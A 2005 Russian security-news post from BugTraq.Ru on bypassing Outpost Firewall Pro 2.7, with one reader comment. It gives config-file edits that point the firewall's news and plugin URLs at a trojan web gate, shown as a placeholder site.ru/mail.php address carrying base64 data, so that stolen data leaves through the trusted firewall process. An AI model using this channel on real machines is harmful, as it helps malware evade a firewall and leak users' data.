BugTraq.Ru
Русский BugTraq
https://bugtraq.ru/rsn/archive/2005/09/07.html

Обход Outpost 2.7
dl // 14.09.05 00:56
Проверялась версия Outpost Firewall Pro ver.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/07.html]
2.7.492.5421 (416). Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для русскоязычной версии):

С:\...\Outpost Firewall\outpost.ini
[HttpAlerts]
...
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях
...

С:\...\Outpost Firewall\op_links.ini
NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data

При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.

Источник: $aSH    
предложить новость  |  обсудить  |  все отзывы (1) [9403]
назад «  » вперед

последние новости
Google заблокировала 2 с лишним миллиона приложений в прошлом году // 30.04.24 13:10
Бэкдор в xz/liblzma, предназначенный для атаки ssh-серверов // 30.03.24 17:23
Три миллиона электронных замков готовы открыть свои двери // 22.03.24 20:22
Doom на газонокосилках // 28.02.24 17:19
Умер Никлаус Вирт // 04.01.24 14:05
С наступающим // 31.12.23 23:59
Четверть приложений, использующих Log4j, до сих пор уязвима // 11.12.23 18:29

Комментарии:

Ты лучше повнимательней приглядись к файлу... 14.09.05 08:17  
Автор: shaelf Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Ты лучше повнимательней приглядись к файлу "конфигурация1.ini", вот там есть где погулять:) (деверенные адреса, доверенные порты и т.д.)
<добавить комментарий>





  Copyright © 2001-2024 Dmitry Leonov Design: Vadim Derkach